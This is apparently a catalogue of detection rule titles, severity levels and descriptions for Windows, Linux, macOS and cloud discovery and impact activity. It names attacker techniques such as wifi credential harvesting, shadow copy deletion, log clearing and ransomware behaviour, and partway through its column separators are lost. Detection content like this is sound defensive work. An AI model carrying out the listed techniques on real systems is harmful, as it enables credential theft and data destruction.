Suspicious Kernel Dump Using Dtrace | high | Detects a suspicious way to dump the kernel on Windows systems using dtrace.exe, which is available on Windows systems since Windows 10 19H1
File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell | high | Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder.
Recon Command Output Piped To Findstr.EXE | medium | Detects the execution of a potential recon command where the results are piped to "findstr". This is meant to trigger on inline calls of "cmd.exe" via the "/c" or "/k" flags, for example. Attackers often use this technique to extract specific information they require in their reconnaissance phase.
Security Tools Keyword Lookup Via Findstr.EXE | medium | Detects execution of "findstr" to search for common names of security tools. Attackers often pipe the results of recon commands such as "tasklist" or "whoami" to "findstr" in order to filter the results. This detection focuses on the keywords that the attacker might use as a filter.
Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE | high | Detects usage of "findstr" with the argument "385201", which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).
Fsutil Drive Enumeration | low | Attackers may leverage fsutil to enumerate connected drives.
Gpresult Display Group Policy Information | medium | Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information
HackTool - Bloodhound/Sharphound Execution | high | Detects command line parameters used by Bloodhound and Sharphound hack tools
HackTool - Certify Execution | high | Detects Certify, a tool for Active Directory certificate abuse, based on PE metadata characteristics and common command line arguments.
HackTool - Certipy Execution | high | Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse, based on PE metadata characteristics and common command line arguments.
HackTool - CrackMapExec Execution | high | This rule detects common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
HackTool - PCHunter Execution | high | Detects suspicious use of PCHunter, a tool like Process Hacker to view and manipulate processes, kernel options and other low level settings
HackTool - SharpLdapWhoami Execution | high | Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller
HackTool - SharpView Execution | high | Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
HackTool - SharpLDAPmonitor Execution | medium | Detects execution of SharpLDAPmonitor, which can monitor the creation, deletion and changes of LDAP objects.
HackTool - SOAPHound Execution | high | Detects the execution of SOAPHound, a .NET tool for collecting Active Directory data, using specific command-line arguments that may indicate an attempt to extract sensitive AD information.
HackTool - TruffleSnout Execution | high | Detects the use of TruffleSnout.exe, an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.
HackTool - WinPwn Execution | high | Detects command line keywords indicative of potential usage of the tool WinPwn, a tool for Windows and Active Directory reconnaissance and exploitation.
Suspicious Execution of Hostname | low | Use of hostname to get information
Potential Reconnaissance Activity Via GatherNetworkInfo.VBS | medium | Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs", which can be used to gather information about the target machine
Firewall Configuration Discovery Via Netsh.EXE | low | Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
New Network Trace Capture Started Via Netsh.EXE | medium | Detects the execution of netsh with the "trace" flag in order to start a network capture
Harvesting Of Wifi Credentials Via Netsh.EXE | medium | Detects the harvesting of wifi credentials using netsh.exe
Suspicious Group And Account Reconnaissance Activity Using Net.EXE | medium | Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE. Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)
System Network Connections Discovery Via Net.EXE | low | Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
Share And Session Enumeration Using Net.EXE | low | Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag.
Nltest.EXE Execution | low | Detects nltest commands that can be used for information discovery
Potential Recon Activity Via Nltest.EXE | medium | Detects nltest commands that can be used for information discovery
Network Reconnaissance Activity | high | Detects a set of suspicious network related commands often used in recon stages
AADInternals PowerShell Cmdlets Execution - ProcessCreation | high | Detects AADInternals cmdlet execution. A tool for administering Azure AD and Office 365, which can be abused by threat actors to attack Azure AD or Office 365.
Potential Active Directory Enumeration Using AD Module - ProcCreation | medium | Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL, which is often used by attackers to perform AD enumeration.
Computer Discovery And Export Via Get-ADComputer Cmdlet | medium | Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet | medium | Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember cmdlet
Malicious PowerShell Commandlets - ProcessCreation | high | Detects Commandlet names from well-known PowerShell exploitation frameworks
User Discovery And Export Via Get-ADUser Cmdlet | medium | Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file
PUA - AdFind Suspicious Execution | high | Detects AdFind execution with common flags seen used during attacks
PUA - Suspicious ActiveDirectory Enumeration Via AdFind.EXE | high | Detects Active Directory enumeration activity using known AdFind CLI flags
PUA - Advanced IP Scanner Execution | medium | Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.
PUA - Advanced Port Scanner Execution | medium | Detects the use of Advanced Port Scanner.
PUA - Crassus Execution | high | Detects Crassus, a Windows privilege escalation discovery tool, based on PE metadata characteristics.
PUA - SoftPerfect Netscan Execution | medium | Detects usage of SoftPerfect's "netscan.exe", an application for scanning networks. It is actively used in-the-wild by threat actors to inspect and understand the network architecture of a victim.
PUA - Nmap/Zenmap Execution | medium | Detects usage of nmap/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation
PUA - Process Hacker Execution | medium | Detects the execution of Process Hacker based on binary metadata information (Image, Hash, Imphash, etc.). Process Hacker is a tool to view and manipulate processes, kernel options and other low level options. Threat actors abused older vulnerable versions to manipulate system processes.
PUA - Seatbelt Execution | high | Detects the execution of the PUA/recon tool Seatbelt via PE information or command line parameters
PUA - System Informer Execution | medium | Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations
PUA - Adidnsdump Execution | low | This tool enables enumeration and exporting of all DNS records in the zone for recon purposes on internal networks. Python 3 and python.exe must be installed. Used to query/modify DNS records for Active Directory integrated DNS via LDAP.
Detected Windows Software Discovery | medium | Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.
Potential Configuration And Service Reconnaissance Via Reg.EXE | medium | Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.
Suspicious Query of MachineGUID | low | Use of reg to get MachineGuid information
Discovery of a System Time | low | Identifies use of various commands to query a system's time. This technique may be used before executing a scheduled task or to discover the time zone of a target system.
Renamed AdFind Execution | high | Detects the use of a renamed Adfind.exe. AdFind continues to be seen across the majority of breaches. It is used for domain trust discovery to plan out subsequent steps in the attack chain.
Renamed Remote Utilities RAT (RURAT) Execution | medium | Detects execution of renamed Remote Utilities (RURAT) via the Product PE header field
Renamed Whoami Execution | critical | Detects the execution of whoami that has been renamed to a different name to avoid detection
Potential Suspicious Activity Using SeCEdit | medium | Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy
Potentially Suspicious EventLog Recon Activity Using Log Query Utilities | medium | Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. This technique is used by threat actors in order to extract sensitive information from event logs such as usernames, IP addresses, hostnames, etc.
Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS | high | Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs", which can be used to gather information about the target machine
Local Accounts Discovery | low | Local accounts, System Owner/User discovery using operating system utilities
Suspicious Network Command | low | Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
Suspicious Scan Loop Network | medium | Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system
Potential Network Sniffing Activity Using Network ToolsmediumDetects potential network sniffing via use of network tools such as "tshark", "windump". Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
Obfuscated IP Download ActivitymediumDetects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command
Obfuscated IP Via CLImediumDetects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line
WhoAmI as ParameterhighDetects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato)
Permission Check Via Accesschk.EXEmediumDetects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges
Suspicious Use of PsLogListmediumDetects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs
Sysinternals PsService ExecutionmediumDetects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering
Sysinternals PsSuspend ExecutionmediumDetects usage of Sysinternals PsSuspend which can be abused to suspend critical processes
Suspicious Execution of SysteminfolowDetects usage of the "systeminfo" command to retrieve information
Use of W32tm as TimerhighWhen configured with suitable command line arguments, w32tm can act as a delay mechanism
Suspicious Where ExecutionlowAdversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.
Enumerate All Information With Whoami.EXEmediumDetects the execution of "whoami.exe" with the "/all" flag
Whoami Utility ExecutionlowDetects the execution of whoami, which is often used by attackers after exploitation / privilege escalation
Whoami.EXE Execution From Privileged ProcesshighDetects the execution of "whoami.exe" by privileged accounts that are often abused by threat actors
Group Membership Reconnaissance Via Whoami.EXEmediumDetects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.
Whoami.EXE Execution With Output OptionmediumDetects the execution of "whoami.exe" with the "/FO" flag to choose CSV as output format or with redirection options to export the results to a file for later use.
Whoami.EXE Execution AnomalymediumDetects the execution of whoami.exe with suspicious parent processes.
Security Privileges Enumeration Via Whoami.EXEhighDetects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.
Computer System Reconnaissance Via Wmic.EXEmediumDetects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.
Local Groups Reconnaissance Via Wmic.EXElowDetects the execution of "wmic" with the "group" flag. Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
Uncommon System Information Discovery Via Wmic.EXEmediumDetects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, and GPU driver products/versions. Some of these commands were used by Aurora Stealer in late 2022/early 2023.
System Disk And Volume Reconnaissance Via Wmic.EXEmediumAn adversary might use WMI to discover information about the system, such as the volume name, size, free space, and other disk information. This can be done using the `wmic` command-line utility and has been observed being used by threat actors such as Volt Typhoon.
Turla Group Lateral MovementcriticalDetects automated lateral movement by Turla group
WannaCry Ransomware ActivitycriticalDetects WannaCry ransomware activity
Potential Baby Shark Malware ActivityhighDetects activity that could be related to Baby Shark malware
Potential Dridex ActivitycriticalDetects potential Dridex acitvity via specific process patterns
Operation Wocao ActivityhighDetects activity mentioned in Operation Wocao report
Operation Wocao Activity - SecurityhighDetects activity mentioned in Operation Wocao report
Potential Pikabot Discovery ActivityhighDetects system discovery activity carried out by Pikabot, such as incl. network, user info and domain groups. The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).
Remote Registry Management Using Reg UtilitymediumRemote registry management using REG utility from non-admin workstation
Userdomain Variable EnumerationlowDetects suspicious enumeration of the domain the user is associated with.
Process DiscoverylowDetects process discovery commands. Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network
Local Firewall Rules Enumeration Via NetFirewallRule CmdletlowDetects execution of "Get-NetFirewallRule" or "Show-NetFirewallRule" to enumerate the local firewall rules on a host.
Potential Registry Reconnaissance Via PowerShell ScriptmediumDetects PowerShell scripts with potential registry reconnaissance capabilities. Adversaries may interact with the Windows registry to gather information about the system credentials, configuration, and installed software.
CMD Shell Output RedirectlowDetects the use of the redirection character ">" to redirect information on the command line. This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
Net.EXE ExecutionlowDetects execution of "Net.EXE".
SC.EXE Query ExecutionlowDetects execution of "sc.exe" to query information about registered services on the system
Suspicious Tasklist Discovery CommandinformationalAdversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network
System Information Discovery Via Wmic.EXElowDetects the use of the WMI command-line (WMIC) utility to identify and display various system information, including OS, CPU, GPU, disk drive names, memory capacity, display resolution, baseboard, BIOS, and GPU driver products/versions.
Potential Backup Enumeration on AWSmediumDetects potential enumeration activity targeting an AWS instance backups
Account Enumeration on AWSlowDetects enumeration of accounts configuration via api call to list different instances and services within a short period of time.
Potential Network Enumeration on AWSlowDetects network enumeration performed on AWS.
Potential Storage Enumeration on AWSmediumDetects potential enumeration activity targeting AWS storage
Network Scans Count By Destination IPmediumDetects many failed connection attempts to different ports or hosts
Network Scans Count By Destination PortmediumDetects many failed connection attempts to different ports or hosts
Silence.Downloader V3highDetects Silence downloader. These commands are hardcoded into the binary.
Automated Turla Group Lateral MovementmediumDetects automated lateral movement by Turla group
Reconnaissance Activity Using BuiltIn CommandsmediumDetects execution of a set of builtin commands often used in recon stages by different attack groups
Enumeration via the Global CatalogmediumDetects enumeration of the global catalog (that can be performed using BloodHound or others AD reconnaissance tools). Adjust Threshold according to domain width.
Domain User Enumeration Network Recon 01mediumDomain user and group enumeration via network reconnaissance. Seen in APT 29 and other common tactics and actors. Detects a set of RPC (remote procedure calls) used to enumerate a domain controller. The rule was created based off the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29
attack.impact 156
Title | Level | Description
Run from a Zip File | medium | Payloads may be compressed, archived, or encrypted in order to avoid detection.
Stop Windows Service | low | Detects a Windows service being stopped.
OpenCanary - NTP Monlist Request | high | Detects instances where an NTP service on an OpenCanary node has received an NTP monlist request.
AWS S3 Bucket Versioning Disable | medium | Detects when S3 bucket versioning is disabled. Threat actors use this technique during AWS ransomware incidents prior to deleting S3 objects.
AWS EC2 Disable EBS Encryption | medium | Identifies disabling of default Amazon Elastic Block Store (EBS) encryption in the current region. Disabling default encryption does not change the encryption status of your existing volumes.
AWS EFS Fileshare Modified or Deleted | medium | Detects when an EFS Fileshare is modified or deleted. You can't delete a file system that is in use. If the file system has any mount targets, the adversary must first delete them, so deletion of a mount will occur before deletion of a fileshare.
AWS EFS Fileshare Mount Modified or Deleted | medium | Detects when an EFS Fileshare Mount is modified or deleted. An adversary deleting a mount target breaks any file system using it, which might disrupt instances or applications using those mounts.
AWS EKS Cluster Created or Deleted | low | Identifies when an EKS cluster is created or deleted.
AWS ElastiCache Security Group Modified or Deleted | low | Identifies when an ElastiCache security group has been modified or deleted.
Azure Application Deleted | medium | Identifies when an application is deleted in Azure.
Azure Application Gateway Modified or Deleted | medium | Identifies when an application gateway is modified or deleted.
Azure Application Security Group Modified or Deleted | medium | Identifies when an application security group is modified or deleted.
Azure Application Credential Modified | medium | Identifies when an application credential is modified.
Azure Container Registry Created or Deleted | low | Detects when a Container Registry is created or deleted.
Azure Device No Longer Managed or Compliant | medium | Identifies when a device in Azure is no longer managed or compliant.
Azure Device or Configuration Modified or Deleted | medium | Identifies when a device or device configuration in Azure is modified or deleted.
Azure DNS Zone Modified or Deleted | medium | Identifies when a DNS zone is modified or deleted.
Azure Firewall Modified or Deleted | medium | Identifies when a firewall is created, modified, or deleted.
Azure Firewall Rule Collection Modified or Deleted | medium | Identifies when Rule Collections (Application, NAT, and Network) are being modified or deleted.
Azure Keyvault Key Modified or Deleted | medium | Identifies when a Keyvault Key is modified or deleted in Azure.
Azure Key Vault Modified or Deleted | medium | Identifies when a key vault is modified or deleted.
Azure Keyvault Secrets Modified or Deleted | medium | Identifies when secrets are modified or deleted in Azure.
Azure Kubernetes Cluster Created or Deleted | low | Detects when an Azure Kubernetes Cluster is created or deleted.
Azure Kubernetes Network Policy Change | medium | Identifies when an Azure Kubernetes network policy is modified or deleted.
Azure Kubernetes Pods Deleted | medium | Identifies the deletion of Azure Kubernetes Pods.
Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted | medium | Detects the creation or patching of potentially malicious RoleBinding/ClusterRoleBinding objects.
Azure Kubernetes Sensitive Role Access | medium | Identifies when ClusterRoles/Roles are being modified or deleted.
Azure Kubernetes Secret or Config Object Access | medium | Identifies when a Kubernetes account accesses sensitive objects such as configmaps or secrets.
Azure Kubernetes Service Account Modified or Deleted | medium | Identifies when a service account is modified or deleted.
Azure Network Firewall Policy Modified or Deleted | medium | Identifies when a Firewall Policy is modified or deleted.
Azure Point-to-site VPN Modified or Deleted | medium | Identifies when a Point-to-site VPN is modified or deleted.
Azure Firewall Rule Configuration Modified or Deleted | medium | Identifies when a Firewall Rule Configuration is modified or deleted.
Azure Network Security Configuration Modified or Deleted | medium | Identifies when a network security configuration is modified or deleted.
Azure Virtual Network Device Modified or Deleted | medium | Identifies when a virtual network device is being modified or deleted. This can be a network interface, network virtual appliance, virtual hub, or virtual router.
Azure Suppression Rule Created | medium | Identifies when a suppression rule is created in Azure. Adversaries could attempt this to evade detection.
Azure Virtual Network Modified or Deleted | medium | Identifies when a Virtual Network is modified or deleted in Azure.
Azure VPN Connection Modified or Deleted | medium | Identifies when a VPN connection is modified or deleted.
Google Cloud Storage Buckets Modified or Deleted | medium | Detects when a storage bucket is modified or deleted in Google Cloud.
Google Cloud Re-identifies Sensitive Information | medium | Identifies when sensitive information is re-identified in Google Cloud.
Google Cloud DNS Zone Modified or Deleted | medium | Identifies when a DNS Zone is modified or deleted in Google Cloud.
Google Cloud Service Account Disabled or Deleted | medium | Identifies when a service account is disabled or deleted in Google Cloud.
Google Cloud Service Account Modified | medium | Identifies when a service account is modified in Google Cloud.
Google Cloud SQL Database Modified or Deleted | medium | Detects when a Cloud SQL DB has been modified or deleted.
Google Cloud VPN Tunnel Modified or Deleted | medium | Identifies when a VPN Tunnel is modified or deleted in Google Cloud.
Google Workspace Application Removed | medium | Detects when an application is removed from Google Workspace.
Google Workspace MFA Disabled | medium | Detects when multi-factor authentication (MFA) is disabled.
Google Workspace Role Modified or Deleted | medium | Detects when a role is modified or deleted in Google Workspace.
Google Workspace Role Privilege Deleted | medium | Detects when a role privilege is deleted in Google Workspace.
Github Delete Action Invoked | medium | Detects delete actions in the Github audit logs for codespaces, environments, projects and repos.
Github Self Hosted Runner Changes Detected | low | A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runner configurations in the environment. Once detected, a self-hosted runner configuration change should be validated from the GitHub UI because the log entry may not provide full context.
Activity Performed by Terminated User | medium | Detects when Microsoft Cloud App Security reports users whose account was terminated in Azure AD but who still perform activities in other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.
Microsoft 365 - Potential Ransomware Activity | medium | Detects when Microsoft Cloud App Security reports that a user uploaded files to the cloud that might be infected with ransomware.
Microsoft 365 - Unusual Volume of File Deletion | medium | Detects when Microsoft Cloud App Security reports that a user has deleted an unusually large volume of files.
Okta API Token Revoked | medium | Detects when an API Token is revoked.
Okta Application Modified or Deleted | medium | Detects when an application is modified or deleted.
Okta Application Sign-On Policy Modified or Deleted | medium | Detects when an application Sign-on Policy is modified or deleted.
Okta Network Zone Deactivated or Deleted | medium | Detects when a Network Zone is deactivated or deleted.
Okta Policy Rule Modified or Deleted | medium | Detects when a Policy Rule is modified or deleted.
Okta Policy Modified or Deleted | low | Detects when an Okta policy is modified or deleted.
Okta Unauthorized Access to App | medium | Detects when unauthorized access to an app occurs.
Okta User Account Locked Out | medium | Detects when a user account is locked out.
OneLogin User Assumed Another User | low | Detects when a user assumed another user account.
OneLogin User Account Locked | low | Detects when a user account is locked or suspended.
Overwriting the File with Dev Zero or Null | low | Detects overwriting (effectively wiping/deleting) of a file.
System Shutdown/Reboot - Linux | informational | Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.
Commands to Clear or Remove the Syslog - Builtin | high | Detects specific commands commonly used to remove or empty the syslog.
Suspicious Log Entries | medium | Detects suspicious log entries in Linux log files.
Linux Crypto Mining Pool Connections | high | Detects process connections to a Monero crypto mining pool.
Linux Crypto Mining Indicators | high | Detects command line parameters or strings often used by crypto miners.
DD File Overwrite | low | Detects potential overwriting and deletion of a file using DD.
Group Has Been Deleted Via Groupdel | medium | Detects execution of the "groupdel" binary, which is used to delete a group. This is sometimes abused by threat actors in order to cover their tracks.
History File Deletion | high | Detects events in which a history file gets deleted, e.g. ~/.bash_history, to remove traces of malicious activity.
Potential Suspicious Change To Sensitive/Critical Files | medium | Detects changes to sensitive and critical files. Monitors files that you don't expect to change without planning on a Linux system.
User Has Been Deleted Via Userdel | medium | Detects execution of the "userdel" binary, which is used to delete a user account and related files. This is sometimes abused by threat actors in order to cover their tracks.
Suspicious MacOS Firmware Activity | medium | Detects when a user manipulates the Firmware Password on macOS. NOTE - this command has been disabled on Apple silicon-based computers.
System Shutdown/Reboot - MacOs | informational | Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.
Time Machine Backup Deletion Attempt Via Tmutil - MacOS | medium | Detects deletion attempts of macOS Time Machine backups via the native backup utility "tmutil". An adversary may perform this action before launching a ransomware attack to prevent the victim from restoring their files.
Time Machine Backup Disabled Via Tmutil - MacOS | medium | Detects disabling of Time Machine (Apple's automated backup utility software) via the native macOS backup utility "tmutil". An attacker can use this to prevent backups from occurring.
New File Exclusion Added To Time Machine Via Tmutil - MacOS | medium | Detects the addition of a new file or path exclusion to macOS Time Machine via the "tmutil" utility. An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.
Cisco Denial of Service | medium | Detects a system being shut down or put into a different boot mode.
Cisco File Deletion | medium | See what files are being deleted from flash file systems.
Cisco Modify Configuration | medium | Modifications to a config that will serve an adversary's impact or persistence.
Monero Crypto Coin Mining Pool Lookup | high | Detects suspicious DNS queries to Monero mining pools.
DNS Events Related To Mining Pools | low | Identifies clients that may be performing DNS lookups associated with common currency mining pools.
Apache Segmentation Fault | high | Detects a segmentation fault error message caused by a crashing Apache worker process.
Nginx Core Dump | high | Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.
Audit CVE Event | critical | Detects events generated by user-mode applications when they call the CveEventWrite API when a known vulnerability is trying to be exploited. MS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability). Unfortunately, that is about the only instance of CVEs being written to this log.
Application Uninstalled | low | An application has been removed. Check if it is critical.
Potential Secure Deletion with SDelete | medium | Detects files that have extensions commonly seen while SDelete is used to wipe files.
User Logoff Event | informational | Detects a user log-off activity. Could be used for example to correlate information during forensic investigations.
Locked Workstation | informational | Detects locked workstation session events that occur automatically after a standard period of inactivity.
Windows Update Error | informational | Detects Windows update errors including installation failures and connection issues. Defenders should observe this in case critical update KBs aren't installed.
NTFS Vulnerability Exploitation | high | Detects the exploitation of an NTFS vulnerability as reported without many details via Twitter.
Important Scheduled Task Deleted | high | Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities.
Backup Files Deleted | medium | Detects deletion of files with extensions often used for backup files. Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.
Suspicious Creation TXT File in User Desktop | high | Ransomware creates a txt file on the user Desktop.
Suspicious Appended Extension | medium | Detects file renames where the target filename uses an uncommon double extension. Could indicate potential ransomware activity renaming files and adding a custom extension to the encrypted files, such as ".jpg.crypted", ".docx.locky", etc.
Load Of RstrtMgr.DLL By A Suspicious Process | high | Detects the load of the RstrtMgr DLL (Restart Manager) by a suspicious process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shutting down specific processes.
Load Of RstrtMgr.DLL By An Uncommon Process | low | Detects the load of the RstrtMgr DLL (Restart Manager) by an uncommon process. This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shutting down specific processes.
Suspicious Volume Shadow Copy Vssapi.dll Load | high | Detects the image load of the VSS DLL by uncommon executables.
Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load | medium | Detects the image load of the VSS DLL by uncommon executables.
Suspicious Volume Shadow Copy VSS_PS.dll Load | high | Detects the image load of vss_ps.dll by uncommon executables.
Network Communication With Crypto Mining Pool | high | Detects initiated network connections to crypto mining pools.
Delete Volume Shadow Copies Via WMI With PowerShell | high | Shadow Copies deletion using operating system utilities via PowerShell.
Potential Active Directory Enumeration Using AD Module - PsModule | medium | Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL, which is often used by attackers to perform AD enumeration.
AADInternals PowerShell Cmdlets Execution - PsScript | high | Detects AADInternals Cmdlet execution. A tool for administering Azure AD and Office 365, which can be abused by threat actors to attack Azure AD or Office 365.
Potential Active Directory Enumeration Using AD Module - PsScript | medium | Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL, which is often used by attackers to perform AD enumeration.
Powershell Add Name Resolution Policy Table Rule | high | Detects PowerShell scripts that add a Name Resolution Policy Table (NRPT) rule for the specified namespace. This will bypass the default DNS server and use a specified server for answering the query.
Silence.EDA Detection | critical | Detects Silence EmpireDNSAgent as described in the Group-IB report.
Remove Account From Domain Admin Group | medium | Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.
Replace Desktop Wallpaper by Powershell | low | An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.
Delete Volume Shadow Copies via WMI with PowerShell - PS Script | high | Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil.
Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script | high | Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil.
Boot Configuration Tampering Via Bcdedit.EXE | high | Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often used by malware or attackers as a destructive step before launching ransomware.
Deleted Data Overwritten Via Cipher.EXE | medium | Detects usage of the "cipher" built-in utility in order to overwrite deleted data on disk. Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.
Copy From VolumeShadowCopy Via Cmd.EXE | high | Detects the execution of the builtin "copy" command that targets a shadow copy (sometimes used to copy registry hives that are in use).
Fsutil Suspicious Invocation | high | Detects suspicious parameters of fsutil (deleting the USN journal, configuring it with a small size, etc.). Might be used by ransomware during the attack (seen with NotPetya and others).
Portable Gpg.EXE Execution | medium | Detects the execution of "gpg.exe" from an uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.
Stop Windows Service Via Net.EXE | low | Detects the stopping of a Windows service via the "net" utility.
AADInternals PowerShell Cmdlets Execution - ProccessCreation | high | Detects AADInternals Cmdlet execution. A tool for administering Azure AD and Office 365, which can be abused by threat actors to attack Azure AD or Office 365.
Potential Active Directory Enumeration Using AD Module - ProcCreation | medium | Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL, which is often used by attackers to perform AD enumeration.
Deletion of Volume Shadow Copies via WMI with PowerShell | high | Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil.
Stop Windows Service Via PowerShell Stop-Service | low | Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service".
Suspicious Reg Add BitLocker | high | Detects suspicious additions to BitLocker related registry keys via the reg.exe utility.
Potentially Suspicious Desktop Background Change Using Reg.EXE | medium | Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.
Renamed Gpg.EXE Execution | high | Detects the execution of a renamed "gpg.exe". Often used by ransomware and loaders to decrypt/encrypt data.
Renamed Sysinternals Sdelete Execution | high | Detects the use of a renamed Sysinternals SDelete, which is something an administrator shouldn't do (the renaming).
Delete Important Scheduled Task | high | Detects when adversaries stop services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities.
Delete All Scheduled Tasks | high | Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.
Disable Important Scheduled Task | high | Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities.
Stop Windows Service Via Sc.EXE | low | Detects the stopping of a Windows service via the "sc.exe" utility.
Suspicious Execution of Shutdown | medium | Use of the command line to shutdown or reboot Windows.
Suspicious Execution of Shutdown to Log Out | medium | Detects the rare use of the command line tool shutdown to log off a user.
Potential Crypto Mining Activity | high | Detects command line parameters or strings often used by crypto miners.
Sensitive File Access Via Volume Shadow Copy Backup | high | Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit).
Shadow Copies Deletion Using Operating Systems Utilities | high | Shadow Copies deletion using operating system utilities.
Potential File Overwrite Via Sysinternals SDelete | high | Detects the use of SDelete to erase a file, not the free space.
